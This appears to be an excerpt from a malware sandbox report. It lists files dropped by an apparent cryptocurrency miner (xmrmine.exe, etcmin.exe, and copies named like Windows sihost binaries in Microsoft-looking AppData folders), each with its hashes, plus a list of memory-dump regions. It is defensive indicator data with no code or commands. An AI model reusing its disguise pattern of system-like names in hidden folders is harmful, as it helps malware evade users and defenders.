C:\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe
MD5
f20a5085dbb85927b25ed46a45fe0a13

SHA1
41b351e45a7be1d6c6c6918ee65b00f5d69ff787

SHA256
370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235

SHA512
4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe
MD5
e149663730c0b03c8936baffe9645bb4

SHA1
c0fb146c35d48481df4149027953e4ab7be59e95

SHA256
33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469

SHA512
553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe

Download Submit
C:\Users\Admin\AppData\Roaming\etcmin.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
C:\Users\Admin\AppData\Roaming\etcmin.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
C:\Users\Admin\AppData\Roaming\rtksmbs.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
C:\Users\Admin\AppData\Roaming\serverpatch.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
C:\Users\Admin\AppData\Roaming\xmrmine.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
C:\Users\Admin\AppData\Roaming\xmrmine.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
MD5
f20a5085dbb85927b25ed46a45fe0a13

SHA1
41b351e45a7be1d6c6c6918ee65b00f5d69ff787

SHA256
370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235

SHA512
4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f

Download Submit
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
MD5
e149663730c0b03c8936baffe9645bb4

SHA1
c0fb146c35d48481df4149027953e4ab7be59e95

SHA256
33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469

SHA512
553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe

Download Submit
C:\Users\Admin\appdata\roaming\rtksmbs.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
C:\Users\Admin\appdata\roaming\serverpatch.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe
MD5
f20a5085dbb85927b25ed46a45fe0a13

SHA1
41b351e45a7be1d6c6c6918ee65b00f5d69ff787

SHA256
370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235

SHA512
4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe
MD5
e149663730c0b03c8936baffe9645bb4

SHA1
c0fb146c35d48481df4149027953e4ab7be59e95

SHA256
33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469

SHA512
553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe

Download Submit
\Users\Admin\AppData\Roaming\etcmin.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
\Users\Admin\AppData\Roaming\rtksmbs.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
\Users\Admin\AppData\Roaming\serverpatch.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
\Users\Admin\AppData\Roaming\xmrmine.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
memory/432-76-0x0000000000000000-mapping.dmp

Download
memory/512-96-0x0000000000000000-mapping.dmp

Download
memory/780-80-0x0000000000000000-mapping.dmp

Download
memory/812-107-0x0000000000000000-mapping.dmp

Download
memory/1004-109-0x000000013F810000-0x000000013F811000-memory.dmp

Filesize
4KB

Download
memory/1004-114-0x0000000002420000-0x0000000002422000-memory.dmp

Filesize
8KB

Download
memory/1004-105-0x0000000000000000-mapping.dmp

Download
memory/1060-75-0x0000000000000000-mapping.dmp

Download
memory/1128-70-0x000000013F2A0000-0x000000013F2A1000-memory.dmp

Filesize
4KB

Download
memory/1128-65-0x0000000000000000-mapping.dmp

Download
memory/1128-73-0x00000000005D0000-0x00000000005D6000-memory.dmp

Filesize
24KB

Download
memory/1128-78-0x000000001CA90000-0x000000001CA92000-memory.dmp

Filesize
8KB

Download
memory/1156-102-0x0000000000000000-mapping.dmp

Download
memory/1200-95-0x0000000000000000-mapping.dmp

Download
memory/1256-119-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1256-122-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1256-121-0x0000000000070000-0x0000000000090000-memory.dmp

Filesize
128KB

Download
memory/1256-123-0x00000000001C0000-0x00000000001E0000-memory.dmp

Filesize
128KB

Download
memory/1256-124-0x00000000001C0000-0x00000000001E0000-memory.dmp

Filesize
128KB

Download
memory/1256-120-0x00000001402EB66C-mapping.dmp

Download
memory/1256-125-0x00000000001F0000-0x0000000000210000-memory.dmp

Filesize
128KB

Download
memory/1320-79-0x000000001CA00000-0x000000001CA02000-memory.dmp

Filesize
8KB

Download
memory/1320-62-0x0000000000000000-mapping.dmp

Download
memory/1320-74-0x0000000000160000-0x0000000000169000-memory.dmp

Filesize
36KB

Download
memory/1320-69-0x000000013F3A0000-0x000000013F3A1000-memory.dmp

Filesize
4KB

Download
memory/1460-77-0x0000000000000000-mapping.dmp

Download
memory/1744-82-0x0000000000000000-mapping.dmp

Download
memory/1744-111-0x000000001B2F0000-0x000000001B2F2000-memory.dmp

Filesize
8KB

Download
memory/1744-87-0x000000013FE80000-0x000000013FE81000-memory.dmp

Filesize
4KB

Download
memory/1820-60-0x0000000076641000-0x0000000076643000-memory.dmp

Filesize
8KB

Download
memory/1940-112-0x000000001CA10000-0x000000001CA12000-memory.dmp

Filesize
8KB

Download
memory/1940-85-0x0000000000000000-mapping.dmp

Download
memory/1940-91-0x000000013FB90000-0x000000013FB91000-memory.dmp

Filesize
4KB

Download
memory/2008-113-0x000000001BE10000-0x000000001BE12000-memory.dmp

Filesize
8KB

Download
memory/2008-98-0x0000000000000000-mapping.dmp

Download
memory/2008-101-0x000000013FA10000-0x000000013FA11000-memory.dmp

Filesize
4KB

Download